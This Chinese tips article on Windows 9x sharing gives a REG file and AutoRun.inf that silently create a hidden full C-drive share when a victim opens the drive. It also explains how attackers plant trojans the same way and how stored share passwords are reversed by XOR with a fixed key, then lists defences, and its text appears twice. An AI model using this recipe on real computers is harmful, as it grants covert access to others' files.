共享另一台电脑的硬盘
如果你希望共享另外一台电脑的所有驱动器,可以利用我们刚刚提到的AutoRun.inf文件,前提是另外一台电脑已经打开139共享。首先编写一个REG文件,打开记事本,键入以下内容:
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Network\Lanman\C$]
"Path"="C:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:
将以上部分另存为ShareC.reg文件备用。要特别注意第一行REGEDIT4要用大写且顶格写,在它后面要空上一行,在最后一行写完后记得要按两次回车键,即最后也要空上一行。
然后编制一个AutoRun.inf文件,键入以下内容:
[AutoRun]
Open=Regedit/s ShareC.reg
加/s参数是为了导入时不会显示任何提示信息,保存AutoRun.inf文件。将ShareC.reg和AutoRun.inf这两个文件都复制到另一台电脑的D盘的根目录下,这样对方只要双击D盘就会将ShareC.reg导入注册表,在另一台电脑重启后C盘就会完全共享,要共享其他任何一个硬盘,方法都相同。
当心主动中木马
一些别有用心的人,会在AutoRun.inf文件中,把“Open=ShareC.Reg”改成“Open=木马服务端文件名”,然后把AutoRun.inf和配置好的木马服务端一起复制到你的D盘的根目录下,这样不需你运行木马服务端程序,而只要你双击了D盘就会使木马运行。这样做的好处显而易见,那就是大大的增加了木马运行的主动性,即使你非常警惕,不熟悉的文件轻易不会运行,也很难防范这种方法。那么要如何防范他人利用AutoRun.inf文件对你进行攻击呢?
共享分类完全是由flags标志决定的,它的键值决定了共享目录的类型。当flags=0x302时,重新启动系统,目录共享标志消失,表面上看没有共享,实际上该目录正处于完全共享状态。网上流行的共享蠕虫,就是利用了此特性。如果把"Flags"=dword:00000302改成"Flags"=dword:00000402,就可以看到硬盘被共享了。
以上代码中的Parmlenc、Parm2enc属性项是加密的密码,系统在加密时采用了8位密码分别与“35 9a 4b a6 53 a9 d4 6a”进行异或运算,要想求出密码再进行一次异或运算,然后查ASCII表可得出目录密码。
解决办法是把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的“C$”、“D$”、“E$”等删掉;然后删除windows\system\下面的Vserver.vxd,它是Microsoft网络上的文件与打印机共享虚拟设备驱动程序;再把HKEY_LOCAL_MACHINE\System\CurrentCo-ntrolSet\Services\VxD\下的Vserver键值删掉,就会很安全了。
事实上,大多数的硬盘根目录下并不需要AutoRun.inf文件来运行程序,因此我们完全可以将硬盘的AutoRun功能关闭,这样即使在硬盘根目录下有AutoRun.inf这个文件,Windows也不会去运行其中指定的程序,从而可以达到防止黑客利用AutoRun.inf文件入侵的目的。
除此以外,我们还应让Windows能显示出隐藏的共享。大家都知道,在Windows 9X中设置共享时,通过在共享名后加上“$”这个符号,可使共享隐藏。比如,我们给一个名为share的计算机的C盘设置共享时,只要将其共享名设为C$,就看不到被共享的C盘,只有通过输入该共享的确切路径,才能访问此共享。不过我们只要将电脑中的msnp32.dll文件稍做修改,就可以让Windows显示出隐藏的共享。
由于在Windows下msnp32.dll会被调用,不能直接修改此文件,所以第一步我们要复制msnp32.dll到C盘下并改名为msnp32,msnp32.dll在C:\Windows\system文件夹下。运行UltraEdit等十六进制文件编辑器打开msnp32,找到“24 56 E8 17”(位于偏移地址00003190~000031A0处),找到后将“24”改为“00”,然后保存,关闭UltraEdit。重启计算机进入DOS模式,在命令提示符下输入copy c:\msnp32.dll c:\Windows\system\msnp32.dll,重启进入Windows,现在双击share就能看见被隐藏的共享了。
最后要提醒大家利用TCP/IP协议设计的NethackerⅡ等黑客软件可以穿过Internet网络,找到共享的主机,然后进行相应操作。所以当您通过Modem上网时,千万要小心,因为一不小心,您的主机将完全共享给对方。防范这类事情发生的方法无非是经常检查系统,给系统打上补丁,经常使用反黑杀毒软件,上网时打开防火墙,注意异常现象,留意AutoRun.inf文件的内容,关闭共享或不要设置为完全共享,且加上复杂的共享密码。
http://www.qqread.com/meetwindows/h111140404.html进入讨论组讨论。
如果你希望共享另外一台电脑的所有驱动器,可以利用我们刚刚提到的AutoRun.inf文件,前提是另外一台电脑已经打开139共享。首先编写一个REG文件,打开记事本,键入以下内容:
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Network\Lanman\C$]
"Path"="C:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000302
"Parmlenc"=hex:
"Parm2enc"=hex:
将以上部分另存为ShareC.reg文件备用。要特别注意第一行REGEDIT4要用大写且顶格写,在它后面要空上一行,在最后一行写完后记得要按两次回车键,即最后也要空上一行。
然后编制一个AutoRun.inf文件,键入以下内容:
[AutoRun]
Open=Regedit/s ShareC.reg
加/s参数是为了导入时不会显示任何提示信息,保存AutoRun.inf文件。将ShareC.reg和AutoRun.inf这两个文件都复制到另一台电脑的D盘的根目录下,这样对方只要双击D盘就会将ShareC.reg导入注册表,在另一台电脑重启后C盘就会完全共享,要共享其他任何一个硬盘,方法都相同。
当心主动中木马
一些别有用心的人,会在AutoRun.inf文件中,把“Open=ShareC.Reg”改成“Open=木马服务端文件名”,然后把AutoRun.inf和配置好的木马服务端一起复制到你的D盘的根目录下,这样不需你运行木马服务端程序,而只要你双击了D盘就会使木马运行。这样做的好处显而易见,那就是大大的增加了木马运行的主动性,即使你非常警惕,不熟悉的文件轻易不会运行,也很难防范这种方法。那么要如何防范他人利用AutoRun.inf文件对你进行攻击呢?
共享分类完全是由flags标志决定的,它的键值决定了共享目录的类型。当flags=0x302时,重新启动系统,目录共享标志消失,表面上看没有共享,实际上该目录正处于完全共享状态。网上流行的共享蠕虫,就是利用了此特性。如果把"Flags"=dword:00000302改成"Flags"=dword:00000402,就可以看到硬盘被共享了。
以上代码中的Parmlenc、Parm2enc属性项是加密的密码,系统在加密时采用了8位密码分别与“35 9a 4b a6 53 a9 d4 6a”进行异或运算,要想求出密码再进行一次异或运算,然后查ASCII表可得出目录密码。
解决办法是把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的“C$”、“D$”、“E$”等删掉;然后删除windows\system\下面的Vserver.vxd,它是Microsoft网络上的文件与打印机共享虚拟设备驱动程序;再把HKEY_LOCAL_MACHINE\System\CurrentCo-ntrolSet\Services\VxD\下的Vserver键值删掉,就会很安全了。
事实上,大多数的硬盘根目录下并不需要AutoRun.inf文件来运行程序,因此我们完全可以将硬盘的AutoRun功能关闭,这样即使在硬盘根目录下有AutoRun.inf这个文件,Windows也不会去运行其中指定的程序,从而可以达到防止黑客利用AutoRun.inf文件入侵的目的。
除此以外,我们还应让Windows能显示出隐藏的共享。大家都知道,在Windows 9X中设置共享时,通过在共享名后加上“$”这个符号,可使共享隐藏。比如,我们给一个名为share的计算机的C盘设置共享时,只要将其共享名设为C$,就看不到被共享的C盘,只有通过输入该共享的确切路径,才能访问此共享。不过我们只要将电脑中的msnp32.dll文件稍做修改,就可以让Windows显示出隐藏的共享。
由于在Windows下msnp32.dll会被调用,不能直接修改此文件,所以第一步我们要复制msnp32.dll到C盘下并改名为msnp32,msnp32.dll在C:\Windows\system文件夹下。运行UltraEdit等十六进制文件编辑器打开msnp32,找到“24 56 E8 17”(位于偏移地址00003190~000031A0处),找到后将“24”改为“00”,然后保存,关闭UltraEdit。重启计算机进入DOS模式,在命令提示符下输入copy c:\msnp32.dll c:\Windows\system\msnp32.dll,重启进入Windows,现在双击share就能看见被隐藏的共享了。
最后要提醒大家利用TCP/IP协议设计的NethackerⅡ等黑客软件可以穿过Internet网络,找到共享的主机,然后进行相应操作。所以当您通过Modem上网时,千万要小心,因为一不小心,您的主机将完全共享给对方。防范这类事情发生的方法无非是经常检查系统,给系统打上补丁,经常使用反黑杀毒软件,上网时打开防火墙,注意异常现象,留意AutoRun.inf文件的内容,关闭共享或不要设置为完全共享,且加上复杂的共享密码。
http://www.qqread.com/meetwindows/h111140404.html进入讨论组讨论。
相关图文阅读
频道图文推荐
健 康 咨 询
时 尚 咨 询
相关专题
- Windows操作系统31招快速修复技巧(上) (173次浏览)
- “调教”磁盘,让Vista更在行 (149次浏览)
- Windows操作系统31招快速修复技巧(中) (118次浏览)
- 满汉全席 打造N合1操作系统安装光盘 (78次浏览)
- 硬盘分区格式你知多少 (64次浏览)
- Windows操作系统31招快速修复技巧(下) (40次浏览)
- 图文并茂 最全面的硬盘分区教程 (20次浏览)
- 修改boot.ini 让启动菜单变“彩” (19次浏览)
- 新手入门之历史上的操作系统回顾 (18次浏览)
- 空格键常用法你不知道的有多少 (6次浏览)
